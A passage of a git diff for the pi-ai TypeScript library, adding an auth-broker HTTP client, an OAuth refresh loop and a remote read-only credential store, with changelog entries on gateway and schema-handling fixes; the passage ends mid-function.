`anthropic-messages-server`, and `openai-responses-server`. +- Added `listProvidersWithEnvKey()` to enumerate every provider with an env-var fallback (used by the new migrate command in coding-agent). + +### Changed + +- Changed `GET /v1/snapshot` to support generation-based polling with `If-None-Match` and `wait` for long-poll updates and to return `304` when no snapshot changes are available +- Changed Bedrock credential resolution for streaming calls to prefer environment keys, AWS profile/SSO credentials, and IMDSv2 fallback when available +- Changed auth-gateway parsing for OpenAI chat-completions and Responses to ignore unsupported SDK-only fields instead of rejecting requests +- Changed auth-gateway protocol handling to include CORS headers on responses and support browser-origin requests +- Changed prompt-cache handling to resolve cache keys from request metadata and headers and preserve them through protocol translation +- Changed Anthropic messages parsing to forward request `metadata` through to downstream execution +- Changed usage report caching to use a 5-minute per-credential TTL with jittered refresh timing to reduce usage endpoint rate-limit collisions +- Changed usage polling failure handling so transient errors continue serving the last known report instead of returning null and dropping the credential from usage aggregates after cache expiry +- Changed `sanitizeSchemaForGoogle` to normalize snake_case schema keys (such as `any_of` and `additional_properties`) to camelCase and auto-generate `propertyOrdering` for multi-property objects +- Changed strict-mode sanitization to resolve `$ref` nodes with sibling keys by inlining and merging referenced local definitions +- Changed strict-mode sanitization to flatten single-entry `allOf` nodes and remove the `allOf` wrapper +- Changed Anthropic tool schema normalization to preserve supported metadata keywords such as `$ref`, `$defs`, `$schema`, `enum`, `const`, `default`, `title`, and `nullable` instead of stripping them +- Changed string schema processing to retain only supported `format` values (`date-time`, `time`, `date`, `duration`, `email`, `hostname`, `uri`, `ipv4`, `ipv6`, `uuid`) and demote unsupported `format` values to `description` hints + +### Fixed + +- Fixed OAuth credential refresh flow so concurrent manual and background refreshes now share one in-flight attempt per credential, and `RemoteAuthCredentialStore` now re-synchronizes before using near-expiring OAuth credentials +- Fixed stale-credential handling after auth failures by waiting for updated broker snapshots and refreshing suspect credentials through broker endpoints before continuing +- Fixed Google Generative AI startup behavior to throw a clear API-key-required error when no key is configured +- Fixed AWS Bedrock image message serialization to preserve base64 `source.bytes` payloads instead of decoding and rebuilding them +- Fixed Google provider error handling to extract the API-reported `error.message` from JSON response bodies when available +- Fixed `RemoteAuthCredentialStore.getUsageReport` to return the matching credential-specific usage report and coalesce parallel callers into one broker `/v1/usage` fetch +- Fixed auth-broker credential upload validation to reject the remote refresh-token sentinel and prevent storing a non-refresh value +- Fixed OpenAI Responses streaming output to emit `reasoning_summary_text` events and parse/send `summary_text` reasoning payloads +- Fixed Anthropic stop-sequence handling by trimming requests to the API limit of four entries before forwarding +- Fixed prompt caching behavior across protocol translations so cached-token usage is preserved when Anthropic and OpenAI requests are routed through each other +- Fixed Claude usage fetching to retry transient `429` and `5xx` responses with exponential backoff, respecting `Retry-After` before returning failure +- Fixed auth-gateway request translation to preserve OpenAI Responses string/system message content, reasoning replay payloads, completed item text in stream item-done events, Anthropic tool-result ordering, and OpenAI Chat/Responses cached-token usage totals +- Fixed auth-gateway failure handling so unsupported request controls, upstream terminal errors, non-streaming aborts, and already-aborted client requests fail explicitly instead of being accepted, ignored, or encoded as successful HTTP 200 responses +- Fixed Gemini CLI / Antigravity tool schema normalization to run the full Cloud Code Assist pipeline, matching shared Google schema handling for union/object merging and nullable extraction +- Fixed stripped validation hints to be preserved as description spill text (`{key: value}` blocks) when `normalizeSchemaForGoogle` and `normalizeSchemaForCCA` drop unsupported schema keywords +- Fixed `sanitizeSchemaForGoogle` to collapse nullability forms (`type:'null'` and null-bearing `anyOf` variants) into `nullable` while preserving remaining variants +- Fixed `sanitizeSchemaForGoogle` to inline local `$defs` references instead of dropping `$ref`/`$defs` structure during Google schema sanitization +- Fixed `normalizeAnthropicToolSchema` to handle self-referential schemas without infinite recursion +- Fixed object schema normalization so explicit open-map declarations (`additionalProperties: true` and schema-valued `additionalProperties`) are preserved instead of being converted to closed objects +- Fixed unsupported schema constraints on arrays and strings (`maxItems`, `uniqueItems`, `pattern`, `minLength`, `maxLength`, and `minItems` when greater than 1) by demoting them into `description` rather than dropping them + +### Security + +- Hardened auth-gateway bearer-token checks with constant-time comparison to avoid timing-side-channel leaks ## [15.1.2] - 2026-05-15 ### Breaking Changes diff --git a/packages/ai/README.md b/packages/ai/README.md index 333d993ec..3ada12a74 100644 --- a/packages/ai/README.md +++ b/packages/ai/README.md @@ -89,7 +89,7 @@ npm install @oh-my-pi/pi-ai ## Quick Start ```typescript -import { z, getModel, stream, complete, Context, Tool, StringEnum } from "@oh-my-pi/pi-ai"; +import { z, getModel, stream, complete, Context, Tool } from "@oh-my-pi/pi-ai"; // Fully typed with auto-complete support for both providers and models const model = getModel("openai", "gpt-4o-mini"); @@ -221,7 +221,7 @@ Tools enable LLMs to interact with external systems. This library uses **Zod** s ### Defining Tools ```typescript -import { z, Tool, StringEnum } from "@oh-my-pi/pi-ai"; +import { z, Tool } from "@oh-my-pi/pi-ai"; // Define tool parameters with Zod const weatherTool: Tool = { @@ -229,13 +229,10 @@ const weatherTool: Tool = { description: "Get current weather for a location", parameters: z.object({ location: z.string().describe("City name or coordinates"), - units: StringEnum(["celsius", "fahrenheit"], { default: "celsius" }), + units: z.enum(["celsius", "fahrenheit"]).default("celsius"), }), }; -// Note: For Google API compatibility, use the StringEnum helper instead of z.enum alone -// when you need wire-compatible { type: "string", enum: [...] } shapes. - const bookMeetingTool: Tool = { name: "book_meeting", description: "Schedule a meeting", diff --git a/packages/ai/package.json b/packages/ai/package.json index d45b13c84..2243a32a6 100644 --- a/packages/ai/package.json +++ b/packages/ai/package.json @@ -42,16 +42,10 @@ }, "dependencies": { "@anthropic-ai/sdk": "catalog:", - "@aws-sdk/client-bedrock-runtime": "catalog:", - "@aws-sdk/credential-provider-node": "catalog:", "@bufbuild/protobuf": "catalog:", - "@google/genai": "catalog:", - "@oh-my-pi/pi-natives": "catalog:", "@oh-my-pi/pi-utils": "catalog:", - "@smithy/node-http-handler": "catalog:", "openai": "catalog:", "partial-json": "catalog:", - "proxy-agent": "catalog:", "zod": "catalog:" }, "devDependencies": { @@ -74,6 +68,22 @@ "types": "./src/*.ts", "import": "./src/*.ts" }, + "./auth-broker": { + "types": "./src/auth-broker/index.ts", + "import": "./src/auth-broker/index.ts" + }, + "./auth-broker/*": { + "types": "./src/auth-broker/*.ts", + "import": "./src/auth-broker/*.ts" + }, + "./auth-gateway": { + "types": "./src/auth-gateway/index.ts", + "import": "./src/auth-gateway/index.ts" + }, + "./auth-gateway/*": { + "types": "./src/auth-gateway/*.ts", + "import": "./src/auth-gateway/*.ts" + }, "./models.json": { "types": "./src/models.json.d.ts", "import": "./src/models.json" diff --git a/packages/ai/scripts/generate-models.ts b/packages/ai/scripts/generate-models.ts index 340a3ba1a..8c3afae4a 100644 --- a/packages/ai/scripts/generate-models.ts +++ b/packages/ai/scripts/generate-models.ts @@ -11,7 +11,7 @@ const COPILOT_PREMIUM_MULTIPLIERS: Record<string, number> = { import * as path from "node:path"; import { $env } from "@oh-my-pi/pi-utils"; -import { AuthCredentialStore } from "../src/auth-storage"; +import { SqliteAuthCredentialStore } from "../src/auth-storage"; import { createModelManager } from "../src/model-manager"; import { applyGeneratedModelPolicies, @@ -51,7 +51,7 @@ async function resolveProviderApiKey(providerId: string, catalog: CatalogDiscove } try { - const storage = await AuthCredentialStore.open(); + const storage = await SqliteAuthCredentialStore.open(); try { const storedApiKey = storage.getApiKey(providerId); if (storedApiKey) { @@ -214,7 +214,7 @@ const ANTIGRAVITY_ENDPOINT = "https://daily-cloudcode-pa.sandbox.googleapis.com" async function getOAuthCredentialsFromStorage(provider: OAuthProvider): Promise<OAuthCredentials | null> { try { - const storage = await AuthCredentialStore.open(); + const storage = await SqliteAuthCredentialStore.open(); try { const creds = storage.getOAuth(provider); if (!creds) { diff --git a/packages/ai/src/auth-broker/client.ts b/packages/ai/src/auth-broker/client.ts new file mode 100644 index 000000000..2b8fd6167 --- /dev/null +++ b/packages/ai/src/auth-broker/client.ts @@ -0,0 +1,261 @@ +/** + * HTTP client for the omp auth-broker server. + * + * Used by {@link RemoteAuthCredentialStore} (snapshot pulls) and by + * `omp auth-broker status` (liveness checks). All endpoints except + * `/v1/healthz` require a bearer token. + */ +import type { ZodType, infer as zInfer } from "zod/v4"; +import type { AuthCredential } from "../auth-storage"; +import type { + CredentialDisableRequest, + CredentialDisableResponse, + CredentialRefreshResponse, + CredentialUploadRequest, + CredentialUploadResponse, + HealthzResponse, + SnapshotResponse, + UsageResponse, +} from "./types"; +import { + credentialDisableResponseSchema, + credentialRefreshResponseSchema, + credentialUploadResponseSchema, + healthzResponseSchema, + snapshotResponseSchema, + usageResponseSchema, +} from "./wire-schemas"; + +export interface AuthBrokerClientOptions { + /** Base URL (e.g. `https://broker.tailnet:8765`). Trailing slashes are trimmed. */ + url: string; + /** Bearer token used for everything except `healthz`. */ + token: string; + /** Per-request timeout in milliseconds. Default 10s. */ + timeoutMs?: number; + /** Retry connection errors this many times. Default 1. */ + maxRetries?: number; + /** Override fetch (used in tests). Default global `fetch`. */ + fetchImpl?: typeof fetch; +} + +export class AuthBrokerError extends Error { + readonly status: number | undefined; + readonly body: string | undefined; + constructor(message: string, opts: { status?: number; body?: string; cause?: unknown } = {}) { + super(message, { cause: opts.cause }); + this.name = "AuthBrokerError"; + this.status = opts.status; + this.body = opts.body; + } +} + +export interface FetchSnapshotOptions { + ifGenerationGt?: number; + waitMs?: number; + signal?: AbortSignal; +} + +export type FetchSnapshotResult = + | { status: 200; snapshot: SnapshotResponse; generation: number } + | { status: 304; generation: number }; + +function parseGenerationTag(header: string | null): number | undefined { + if (!header) return undefined; + let value = header.trim(); + if (value.startsWith("W/")) value = value.slice(2).trim(); + if (value.startsWith('"') && value.endsWith('"') && value.length >= 2) { + value = value.slice(1, -1); + } + const generation = Number(value); + if (!Number.isInteger(generation) || generation < 0) return undefined; + return generation; +} + +const DEFAULT_TIMEOUT_MS = 10_000; +const DEFAULT_MAX_RETRIES = 1; + +export class AuthBrokerClient { + readonly #baseUrl: string; + readonly #token: string; + readonly #timeoutMs: number; + readonly #maxRetries: number; + readonly #fetch: typeof fetch; + + constructor(opts: AuthBrokerClientOptions) { + this.#baseUrl = opts.url.replace(/\/+$/, ""); + this.#token = opts.token; + this.#timeoutMs = opts.timeoutMs ?? DEFAULT_TIMEOUT_MS; + this.#maxRetries = opts.maxRetries ?? DEFAULT_MAX_RETRIES; + this.#fetch = opts.fetchImpl ?? fetch; + } + + healthz(signal?: AbortSignal): Promise<HealthzResponse> { + return this.#request("GET", "/v1/healthz", { schema: healthzResponseSchema, auth: false, signal }); + } + + async fetchSnapshot(opts: FetchSnapshotOptions = {}): Promise<FetchSnapshotResult> { + return this.#fetchSnapshotResult(opts); + } + async #fetchSnapshotResult(opts: FetchSnapshotOptions): Promise<FetchSnapshotResult> { + const query = new URLSearchParams(); + if (opts.waitMs !== undefined) query.set("wait", String(opts.waitMs)); + const path = `/v1/snapshot${query.size > 0 ? `?${query.toString()}` : ""}`; + const headers: Record<string, string> = {}; + if (opts.ifGenerationGt !== undefined) headers["If-None-Match"] = `"${opts.ifGenerationGt}"`; + const timeoutMs = + opts.waitMs !== undefined && opts.waitMs > 0 ? Math.max(this.#timeoutMs, opts.waitMs + 1000) : undefined; + const response = await this.#fetchRaw("GET", path, { + auth: true, + headers, + signal: opts.signal, + timeoutMs, + }); + const etagGeneration = parseGenerationTag(response.headers.get("etag")); + if (response.status === 304) { + return { status: 304, generation: etagGeneration ?? opts.ifGenerationGt ?? 0 }; + } + const text = await response.text(); + const raw = this.#parseJson(text, response.status); + const validated = snapshotResponseSchema.safeParse(raw); + if (!validated.success) { + throw new AuthBrokerError("Auth broker response failed schema validation", { + status: response.status, + body: validated.error.message, + }); + } + const snapshot = validated.data as SnapshotResponse; + return { status: 200, snapshot, generation: etagGeneration ?? snapshot.generation }; + } + + fetchUsage(signal?: AbortSignal): Promise<UsageResponse> { + // Validates the envelope (`generatedAt`, `reports[].provider`, `limits`, + // `metadata`) but leaves provider-specific extension fields permissive so + // the broker can ship new shapes ahead of the client. `raw` is accepted + // but normally stripped by the broker before send. + return this.#request("GET", "/v1/usage", { schema: usageResponseSchema, signal }) as Promise<UsageResponse>; + } + + async refreshCredential(id: number, signal?: AbortSignal): Promise<CredentialRefreshResponse> { + return this.#request("POST", `/v1/credential/${id}/refresh`, { + schema: credentialRefreshResponseSchema, + signal, + }) as Promise<CredentialRefreshResponse>; + } + + async disableCredential(id: number, cause: string, signal?: AbortSignal): Promise<CredentialDisableResponse> { + const body: CredentialDisableRequest = { cause }; + return this.#request("POST", `/v1/credential/${id}/disable`, { + body, + schema: credentialDisableResponseSchema, + signal, + }); + } + + async uploadCredential( + provider: string, + credential: AuthCredential, + signal?: AbortSignal, + ): Promise<CredentialUploadResponse> { + const body: CredentialUploadRequest = { provider, credential }; + return this.#request("POST", "/v1/credential", { + body, + schema: credentialUploadResponseSchema, + signal, + }) as Promise<CredentialUploadResponse>; + } + + async #request<TSchema extends ZodType>( + method: "GET" | "POST", + path: string, + opts: { schema: TSchema; auth?: boolean; body?: unknown; signal?: AbortSignal }, + ): Promise<zInfer<TSchema>> { + const response = await this.#fetchRaw(method, path, opts); + const text = await response.text(); + const raw = this.#parseJson(text, response.status); + const validated = opts.schema.safeParse(raw); + if (!validated.success) { + throw new AuthBrokerError("Auth broker response failed schema validation", { + status: response.status, + body: validated.error.message, + }); + } + return validated.data; + } + + #parseJson(text: string, status: number): unknown { + try { + return text.length === 0 ? null : JSON.parse(text); + } catch (parseError) { + throw new AuthBrokerError("Auth broker returned malformed JSON", { + status, + body: text, + cause: parseError, + }); + } + } + + async #fetchRaw( + method: "GET" | "POST", + path: string, + opts: { + auth?: boolean; + body?: unknown; + signal?: AbortSignal; + headers?: Record<string, string>; + timeoutMs?: number; + }, + ): Promise<Response> { + const auth = opts.auth ?? true; + const url = `${this.#baseUrl}${path}`; + const headers: Record<string, string> = { Accept: "application/json", ...(opts.headers ?? {}) }; + if (auth) headers.Authorization = `Bearer ${this.#token}`; + let payload: string | undefined; + if (opts.body !== undefined) { + payload = JSON.stringify(opts.body); + headers["Content-Type"] = "application/json"; + } + + // Fast-fail when the caller's signal is already aborted — avoids spinning + // up a fetch + timer that the first `await` would just abort anyway. + if (opts.signal?.aborted) { + throw new AuthBrokerError("Auth broker request aborted", { cause: opts.signal.reason }); + } + + let lastError: unknown; + for (let attempt = 0; attempt <= this.#maxRetries; attempt += 1) { + const timeoutSignal = AbortSignal.timeout(opts.timeoutMs ?? this.#timeoutMs); + const signal = opts.signal ? AbortSignal.any([opts.signal, timeoutSignal]) : timeoutSignal; + try { + const response = await this.#fetch(url, { + method, + headers, + body: payload, + signal, + }); + if (!response.ok && response.status !== 304) { + const text = await response.text(); + throw new AuthBrokerError(`Auth broker request failed: ${response.status} ${response.statusText}`, { + status: response.status, + body: text, + }); + } + return response; + } catch (error) { + lastError = error; + // Caller-driven abort wins over retry — the caller said stop. + if (opts.signal?.aborted) { + throw new AuthBrokerError("Auth broker request aborted", { cause: opts.signal.reason }); + } + if (error instanceof AuthBrokerError && error.status !== undefined) { + // HTTP errors (4xx/5xx) don't retry — caller knows what to do. + throw error; + } + if (attempt >= this.#maxRetries) break; + } + } + throw new AuthBrokerError(`Auth broker request failed after ${this.#maxRetries + 1} attempt(s)`, { + cause: lastError, + }); + } +} diff --git a/packages/ai/src/auth-broker/index.ts b/packages/ai/src/auth-broker/index.ts new file mode 100644 index 000000000..4858fbfdf --- /dev/null +++ b/packages/ai/src/auth-broker/index.ts @@ -0,0 +1,5 @@ +export * from "./client"; +export * from "./refresher"; +export * from "./remote-store"; +export * from "./server"; +export * from "./types"; diff --git a/packages/ai/src/auth-broker/refresher.ts b/packages/ai/src/auth-broker/refresher.ts new file mode 100644 index 000000000..6c226dd5a --- /dev/null +++ b/packages/ai/src/auth-broker/refresher.ts @@ -0,0 +1,127 @@ +/** + * Background OAuth refresh loop for the auth-broker server. + * + * Iterates active OAuth credentials at `refreshIntervalMs` cadence, refreshing + * any whose `expires - Date.now() < refreshSkewMs`. Refresh single-flight + * lives in {@link AuthStorage} so manual and background refreshes share the + * same upstream attempt. + * Definitively-failed credentials (invalid_grant / 401 not from network blip) + * are disabled via {@link AuthStorage.disableCredentialById} so the next + * snapshot pull surfaces a clean delete on the client. + */ +import { logger } from "@oh-my-pi/pi-utils"; +import type { AuthStorage } from "../auth-storage"; +import { DEFAULT_REFRESH_INTERVAL_MS, DEFAULT_REFRESH_SKEW_MS } from "./types"; + +export interface AuthBrokerRefresherOptions { + storage: AuthStorage; + /** Refresh credentials expiring within this window. Default 5 min. */ + refreshSkewMs?: number; + /** Loop cadence. Default 60s. */ + refreshIntervalMs?: number; + /** Override clock (tests). */ + now?: () => number; +} + +const INVALID_GRANT_REGEX = /invalid_grant|invalid_token|revoked|unauthorized|expired.*refresh|refresh.*expired/i; +const TRANSIENT_REGEX = /timeout|network|fetch failed|ECONNREFUSED/i; +const HTTP_401_403_REGEX = /\b(401|403)\b/; + +function isDefinitiveFailure(errorMsg: string): boolean { + if (INVALID_GRANT_REGEX.test(errorMsg)) return true; + if (HTTP_401_403_REGEX.test(errorMsg) && !TRANSIENT_REGEX.test(errorMsg)) return true; + return false; +} + +export interface AuthBrokerRefresherSchedule { + enabled: boolean; + intervalMs: number; + skewMs: number; + nextSweepAt: number; +} + +export class AuthBrokerRefresher { + readonly #storage: AuthStorage; + readonly #refreshSkewMs: number; + readonly #refreshIntervalMs: number; + readonly #now: () => number; + #timer: NodeJS.Timeout | undefined; + #running = false; + #nextSweepAt: number; + constructor(opts: AuthBrokerRefresherOptions) { + this.#storage = opts.storage; + this.#refreshSkewMs = opts.refreshSkewMs ?? DEFAULT_REFRESH_SKEW_MS; + this.#refreshIntervalMs = opts.refreshIntervalMs ?? DEFAULT_REFRESH_INTERVAL_MS; + this.#now = opts.now ?? Date.now; + this.#nextSweepAt = this.#now(); + } + + start(): void { + if (this.#timer !== undefined) return; + // Refresh sweep is best-effort; kick once immediately so freshly-booted + // brokers don't hand out near-expired tokens for the first interval. + this.#nextSweepAt = this.#now(); + void this.tick(); + this.#timer = setInterval(() => { + void this.tick(); + }, this.#refreshIntervalMs); + } + + stop(): void { + if (this.#timer !== undefined) { + clearInterval(this.#timer); + this.#timer = undefined; + } + } + + getSchedule(): AuthBrokerRefresherSchedule { + return { + enabled: true, + intervalMs: this.#refreshIntervalMs, + skewMs: this.#refreshSkewMs, + nextSweepAt: this.#nextSweepAt, + }; + } + + /** Run one sweep. Exposed for tests. */ + async tick(): Promise<void> { + if (this.#running) return; + this.#running = true; + this.#nextSweepAt = this.#now(); + try { + await this.#storage.reload(); + const snapshot = this.#storage.exportSnapshot(); + const now = this.#now(); + const deadline = now + this.#refreshSkewMs; + const targets: number[] = []; + for (const entry of snapshot.credentials) { + if (entry.credential.type !== "oauth") continue; + const expires = entry.credential.expires; + if (typeof expires !== "number" || !Number.isFinite(expires)) continue; + if (expires > deadline) continue; + targets.push(entry.id); + } + await Promise.all(targets.map(id => this.#refreshOne(id))); + } finally { + this.#running = false; + this.#nextSweepAt = this.#now() + this.#refreshIntervalMs; + } + } + + async #refreshOne(id: number): Promise<void> { + try { + await this.#storage.refreshCredentialById(id); + } catch (error) { + const errorMsg = String(error); + if (isDefinitiveFailure(errorMsg)) { + logger.warn("auth-broker refresh failed definitively; disabling credential", { + id, + error: errorMsg, + }); + this.#storage.disableCredentialById(id, `auth-broker refresh failed: ${errorMsg}`); + } else { + logger.debug("auth-broker refresh failed (transient)", { id, error: errorMsg }); + } + } + } +} diff --git a/packages/ai/src/auth-broker/remote-store.ts b/packages/ai/src/auth-broker/remote-store.ts new file mode 100644 index 000000000..5a65d7583 --- /dev/null +++ b/packages/ai/src/auth-broker/remote-store.ts @@ -0,0 +1,409 @@ +/** + * Client-side {@link AuthCredentialStore} that mirrors a remote broker's + * snapshot. Refresh tokens never leave the broker; mutating methods (`replace*`, + * `upsert*`, `delete*ForProvider`) throw because login flows are server-side. + * + * Cache (`getCache`/`setCache`/`cleanExpiredCache`) is in-memory and ephemeral — + * usage reports cache TTL is 5 minutes per credential, so durability across + * runs isn't required. + */ +import { scheduler } from "node:timers/promises"; +import { logger } from "@oh-my-pi/pi-utils"; +import { + type AuthCredential, + type AuthCredentialStore, + type OAuthCredential, + REMOTE_REFRESH_SENTINEL, + type StoredAuthCredential, +} from "../auth-storage"; +import type { Provider } from "../types"; +import type { UsageReport } from "../usage"; +import type { OAuthCredentials } from "../utils/oauth/types"; +import type { AuthBrokerClient } from "./client"; +import type { SnapshotResponse } from "./types"; + +/** + * Client-side TTL for the aggregate `/v1/usage` response. Set below the + * broker server's own 30s usage cache so we typically pick up the broker's + * cached value instead of re-walking the network — but high enough to absorb + * the parallel fan-out from `#rankOAuthSelections` into a single round-trip. + */ +const USAGE_CACHE_TTL_MS = 15_000; +const WAIT_THRESHOLD_MS = 1_000; +const MAX_WAIT_MS = 5_000; +const BACKGROUND_WAIT_MS = 30_000; +const BACKGROUND_BACKOFF_INITIAL_MS = 500; +const BACKGROUND_BACKOFF_MAX_MS = 30_000; + +function emptySnapshot(): SnapshotResponse { + return { + generation: 0, + generatedAt: 0, + serverNowMs: 0, + refresher: { + enabled: false, + intervalMs: 0, + skewMs: 0, + nextSweepInMs: Number.MAX_SAFE_INTEGER, + }, + credentials: [], + }; +} + +interface CacheEntry { + value: string; + expiresAtSec: number; +} + +interface UsageCacheEntry { + reports: UsageReport[]; + fetchedAt: number; +} + +export interface RemoteAuthCredentialStoreOptions { + client: AuthBrokerClient; + /** + * Initial snapshot. When omitted, callers must call + * {@link RemoteAuthCredentialStore.refreshSnapshot} before the first read. + */ + initialSnapshot?: SnapshotResponse; +} + +export class RemoteAuthCredentialStore implements AuthCredentialStore { + readonly #client: AuthBrokerClient; + #snapshot: SnapshotResponse = emptySnapshot(); + #snapshotReceivedAt = Date.now(); + #generation = 0; + #backgroundAbort = new AbortController(); + #cache: Map<string, CacheEntry> = new Map(); + #usageCache?: UsageCacheEntry; + #usageInflight?: Promise<UsageReport[] | null>; + #closed = false; + + constructor(opts: RemoteAuthCredentialStoreOptions) { + this.#client = opts.client; + this.#applySnapshot(opts.initialSnapshot ?? emptySnapshot(), opts.initialSnapshot?.generation ?? 0); + void this.#runBackgroundLongPoll(); + } + + get client(): AuthBrokerClient { + return this.#client; + } + + get snapshot(): SnapshotResponse { + return this.#snapshot; + } + + #applySnapshot(snapshot: SnapshotResponse, generation: number): void { + this.#snapshot = snapshot; + this.#generation = generation; + this.#snapshotReceivedAt = Date.now(); + } + + async #runBackgroundLongPoll(): Promise<void> { + let backoffMs = BACKGROUND_BACKOFF_INITIAL_MS; + while (!this.#closed && !this.#backgroundAbort.signal.aborted) { + try { + const result = await this.#client.fetchSnapshot({ + ifGenerationGt: this.#generation, + waitMs: BACKGROUND_WAIT_MS, + signal: this.#backgroundAbort.signal, + }); + if (result.status === 200) this.#applySnapshot(result.snapshot, result.generation); + backoffMs = BACKGROUND_BACKOFF_INITIAL_MS; + } catch (error) { + if (this.#closed || this.#backgroundAbort.signal.aborted) break; + logger.debug("auth-broker background snapshot sync failed", { error: String(error) }); + await scheduler.wait(backoffMs, { signal: this.#backgroundAbort.signal }).catch(() => {}); + backoffMs = Math.min(BACKGROUND_BACKOFF_MAX_MS, backoffMs * 2); + } + } + } + + /** Re-hydrate the in-memory snapshot from the broker. */ + async refreshSnapshot(): Promise<SnapshotResponse> { + const result = await this.#client.fetchSnapshot(); + if (result.status === 200) this.#applySnapshot(result.snapshot, result.generation); + return this.#snapshot; + } + + listAuthCredentials(provider?: string): StoredAuthCredential[] { + const out: StoredAuthCredential[] = []; + for (const entry of this.#snapshot.credentials) { + if (provider !== undefined && entry.provider !== provider) continue; + out.push({ + id: entry.id, + provider: entry.provider, + credential: entry.credential as AuthCredential, + disabledCause: null, + }); + } + return out; + } + + /** + * In-memory update from a successful refresh through the broker. AuthStorage + * calls this after `#replaceCredentialAt`; the broker already persisted the + * authoritative row, so we just mirror it. + */ + updateAuthCredential(id: number, credential: AuthCredential): void { + for (const entry of this.#snapshot.credentials) { + if (entry.id !== id) continue; + entry.credential = credential as typeof entry.credential; + return; + } + } + + deleteAuthCredential(id: number, disabledCause: string): void { + const next = this.#snapshot.credentials.filter(entry => entry.id !== id); + this.#snapshot = { ...this.#snapshot, credentials: next }; + // Fire-and-forget: tell the broker to persist the disable. + this.#client.disableCredential(id, disabledCause).catch(error => { + logger.warn("auth-broker disable propagation failed", { id, error: String(error) }); + }); + } + + tryDisableAuthCredentialIfMatches(id: number, _expectedData: string, disabledCause: string): boolean { + const found = this.#snapshot.credentials.find(entry => entry.id === id); + if (!found) return false; + this.deleteAuthCredential(id, disabledCause); + return true; + } + + async waitForFreshSnapshot(maxWaitMs: number, opts: { signal?: AbortSignal } = {}): Promise<boolean> { + const previousGeneration = this.#generation; + const result = await this.#client.fetchSnapshot({ + ifGenerationGt: this.#generation, + waitMs: maxWaitMs, + signal: opts.signal, + }); + if (result.status === 200) this.#applySnapshot(result.snapshot, result.generation); + return this.#generation !== previousGeneration; + } + + async prepareForRequest(credentialId: number, opts: { signal?: AbortSignal } = {}): Promise<boolean> { + const entry = this.#snapshot.credentials.find(candidate => candidate.id === credentialId); + if (!entry || entry.credential.type !== "oauth" || entry.rotatesInMs === null) return false; + const remainingMs = this.#snapshotReceivedAt + entry.rotatesInMs - Date.now(); + if (remainingMs > WAIT_THRESHOLD_MS) return false; + return this.waitForFreshSnapshot(MAX_WAIT_MS, opts); + } + + async markCredentialSuspect(credentialId: number, opts: { signal?: AbortSignal } = {}): Promise<void> { + await this.#client.refreshCredential(credentialId, opts.signal); + await this.waitForFreshSnapshot(MAX_WAIT_MS, opts); + } + + replaceAuthCredentialsForProvider(_provider: string, _credentials: AuthCredential[]): StoredAuthCredential[] { + throw new Error( + "RemoteAuthCredentialStore is read-only on the client. Use `omp auth-broker login <provider>` to mutate credentials.", + ); + } + + upsertAuthCredentialForProvider(_provider: string, _credential: AuthCredential): StoredAuthCredential[] { + throw new Error( + "RemoteAuthCredentialStore is read-only on the client. Use `omp auth-broker login <provider>` to mutate credentials.", + ); + } + + deleteAuthCredentialsForProvider(_provider: string, _disabledCause: string): void { + throw new Error( + "RemoteAuthCredentialStore is read-only on the client. Use `omp auth-broker logout <provider>` to mutate credentials.", + ); + } + + getCache(key: string): string | null { + const entry = this.#cache.get(key); + if (!entry) return null; + if (entry.expiresAtSec * 1000 <= Date.now()) { + this.#cache.delete(key); + return null; + } + return entry.value; + } + + setCache(key: string, value: string, expiresAtSec: number): void { + this.#cache.set(key, { value, expiresAtSec }); + } + + cleanExpiredCache(): void { + const nowSec = Math.floor(Date.now() / 1000); + for (const [key, entry] of this.#cache) { + if (entry.expiresAtSec <= nowSec) this.#cache.delete(key); + } + } + + /** + * Store-level hook consumed by `AuthStorage` — routes refresh through the + * broker so the actual refresh token never leaves the broker host. Returns + * the broker-redacted credential with {@link REMOTE_REFRESH_SENTINEL} in + * the `refresh` slot. + */ + async refreshOAuthCredential( + _provider: Provider, + credentialId: number, + _credential: OAuthCredential, + signal?: AbortSignal, + ): Promise<OAuthCredentials> { + const { entry } = await this.#client.refreshCredential(credentialId, signal); + await this.refreshSnapshot().catch(error => { + logger.debug("auth-broker snapshot refresh after credential refresh failed", { error: String(error) }); + }); + if (entry.credential.type !== "oauth") { + throw new Error(`Broker returned non-OAuth credential for id=${credentialId}`); + } + const refreshed = entry.credential; + return { + access: refreshed.access, + refresh: REMOTE_REFRESH_SENTINEL, + expires: refreshed.expires, + accountId: refreshed.accountId, + email: refreshed.email, + projectId: refreshed.projectId, + enterpriseUrl: refreshed.enterpriseUrl, + }; + } + + /** + * Store-level hook consumed by `AuthStorage.fetchUsageReports()` — proxies + * to the broker's `/v1/usage` endpoint. The broker's egress IP isn't + * rate-limited by Anthropic's per-IP `/usage` cap the way a heavy + * residential laptop is, so all credentials surface every cycle. + */ + async fetchUsageReports(signal?: AbortSignal): Promise<UsageReport[] | null> { + return this.#raceWithSignal(this.#loadUsageReports(), signal); + } + + /** + * Per-credential usage hook consumed by `AuthStorage.#getUsageReport`. Pulls + * the aggregate broker `/v1/usage` once and serves all callers from the + * same response (coalesced + cached), then matches the credential to a + * report by provider + identity (accountId / email / projectId). + * + * The broker already aggregates with its own 30s TTL on the server side; our + * 15s client TTL is below that so we usually re-use the broker's cache too. + */ + async getUsageReport( + provider: Provider, + credential: OAuthCredential, + signal?: AbortSignal, + ): Promise<UsageReport | null> { + const reports = await this.#raceWithSignal(this.#loadUsageReports(), signal); + if (!reports) return null; + return matchUsageReport(reports, provider, credential); + } + + /** + * Reject the awaited promise when the caller's signal aborts, without + * affecting the shared upstream fetch. Used to give each caller their + * own cancel without one caller's abort cascading into a peer's in-flight + * request through the single-flight `#usageInflight`. + */ + #raceWithSignal<T>(promise: Promise<T>, signal?: AbortSignal): Promise<T> { + if (!signal) return promise; + if (signal.aborted) return Promise.reject(new Error("auth-broker request aborted")); + return new Promise<T>((resolve, reject) => { + const onAbort = (): void => { + signal.removeEventListener("abort", onAbort); + reject(new Error("auth-broker request aborted")); + }; + signal.addEventListener("abort", onAbort, { once: true }); + promise.then( + value => { + signal.removeEventListener("abort", onAbort); + resolve(value); + }, + err => { + signal.removeEventListener("abort", onAbort); + reject(err); + }, + ); + }); + } + + #loadUsageReports(): Promise<UsageReport[] | null> { + const cached = this.#usageCache; + if (cached && Date.now() - cached.fetchedAt < USAGE_CACHE_TTL_MS) { + return Promise.resolve(cached.reports); + } + if (this.#usageInflight) return this.#usageInflight; + const inflight = this.#client + .fetchUsage() + .then(body => { + this.#usageCache = { reports: body.reports, fetchedAt: Date.now() }; + return body.reports; + }) + .catch(error => { + 